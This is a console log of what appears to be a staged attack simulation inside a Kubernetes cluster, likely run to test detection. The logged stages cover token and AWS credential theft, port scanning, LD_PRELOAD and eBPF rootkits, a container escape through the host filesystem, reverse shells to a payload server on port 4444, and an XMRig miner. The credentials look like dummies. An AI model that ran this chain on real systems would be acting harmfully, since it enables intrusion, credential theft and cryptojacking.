[1;33m[22:23:45] Testing connectivity: http://payload-server.bilal.svc.cluster.local:8080[0m
[1;33m[22:23:45] Downloading 8 payloads[0m
[0;32m[22:23:46] Downloaded 10 files (25M)[0m
[0;32m[22:23:46] Launching attack chain[0m
[0;35m[22:23:46] ======== ATTACK SIMULATION ========[0m
[0;36m[22:23:46] Environment setup[0m
[0;36m[22:23:46] Deploying binaries[0m
[0;34m[22:23:46] Stage 1: K8s token theft[0m
[1;33m[22:23:46]   ✓ Token extracted: ZXlKaGJHY2lPaUpTVXpJMU5pSXNJbX...[0m
[1;33m[22:23:46]   ✓ Token saved to: /dev/shm/.../...HIDDEN.../k8s_token.txt[0m
[0;32m[22:23:46] ✓ K8s token theft complete[0m
[0;34m[22:23:46] Stage 2: Credential sweep[0m
[1;33m[22:23:46]   ✓ Found IAM role: dummy-k8s-cluster-role[0m
[1;33m[22:23:46]   ✓ Found AWS AccessKeyId: AKIADUMMYDUMY2D***[0m
[0;32m[22:23:46] ✓ Credential sweep complete (3 sources found)[0m
[0;34m[22:23:46] Stage 3: Port scanning payload-server.bilal.svc.cluster.local[0m
[1;33m[22:23:46]   Port 22: closed[0m
[1;33m[22:23:46]   Port 80: closed[0m
[1;33m[22:23:46]   Port 443: closed[0m
[1;33m[22:23:46]   Port 8080: open[0m
[1;33m[22:23:46]   Port 4444: open[0m
[1;33m[22:23:46]   Port 7456: open[0m
[0;32m[22:23:46] ✓ Port scan complete (3/6 ports open)[0m
[0;34m[22:23:46] Stage 4: Process hiding techniques[0m
[1;33m[22:23:46]   - Deploying LD_PRELOAD rootkit...[0m
[1;33m[22:23:47]   ✓ LD_PRELOAD configured: /usr/local/lib/xmx2.so[0m
[1;33m[22:23:47]   ✓ File attributes: ----i---------------[0m
[1;33m[22:23:47]   ✓ LD_PRELOAD detection window complete (technique detected)[0m
[1;33m[22:23:47]   - Deploying eBPF rootkit...[0m
[1;33m[22:23:47]   ✓ eBPF rootkit deployed (PID: 116)[0m
[0;32m[22:23:47] ✓ Process hiding techniques deployed[0m
[0;34m[22:23:47] Stage 5: Container escape[0m
[1;33m[22:23:47]   - Attempting container breakout via host filesystem...[0m
[1;33m[22:23:47]   ✓ Host filesystem mounted at /host[0m
[1;33m[22:23:47]   ✓ Access to /host/etc/passwd (25 users)[0m
[1;33m[22:23:47]   ✓ Access to /host/root directory[0m
[1;33m[22:23:47]   ✓ Remount successful on /dev/shm[0m
[0;32m[22:23:47] ✓ Container escape complete[0m
[0;34m[22:23:47] Stage 6: AWS credential theft and enumeration[0m
[1;33m[22:23:47]   ✓ Credentials loaded:[0m
[1;33m[22:23:47]     AccessKeyId: AKIADUMMYDUMY2DUMMYK[0m
[1;33m[22:23:47]     SecretKey: dummySecre***[0m
[1;33m[22:23:47]   - Making AWS API calls:[0m
[1;33m[22:23:47]     → aws sts get-caller-identity[0m
[1;33m[22:23:47]       /root/run.sh: line 215: aws: command not found[0m
[1;33m[22:23:47]     → aws iam get-user[0m
[1;33m[22:23:47]       /root/run.sh: line 224: aws: command not found[0m
[1;33m[22:23:47]     → aws iam list-roles --max-items 3[0m
[1;33m[22:23:47]       /root/run.sh: line 233: aws: command not found[0m
[0;32m[22:23:47] ✓ AWS enumeration complete (3 API calls attempted)[0m
[0;34m[22:23:47] Stage 7: Reverse shell connections[0m
[1;33m[22:23:47]   - Target: payload-server.bilal.svc.cluster.local (172.20.210.17):4444[0m
[1;33m[22:23:47]   - Attempting bash reverse shell...[0m
[1;33m[22:23:47]     ✓ Bash shell connected to 172.20.210.17:4444[0m
[1;33m[22:23:47]   - Attempting python reverse shell...[0m
[1;33m[22:23:47]     - Python shell timeout (connection attempted)[0m
[1;33m[22:23:47]   - Attempting netcat reverse shell...[0m
[1;33m[22:23:47]     - Netcat shell timeout (connection attempted)[0m
[0;32m[22:23:47] ✓ Reverse shells: 1/3 successful connections[0m
[0;34m[22:23:47] Stage 8: Cryptomining[0m
[1;33m[22:23:47]   - Starting XMRig miner (60s duration)[0m
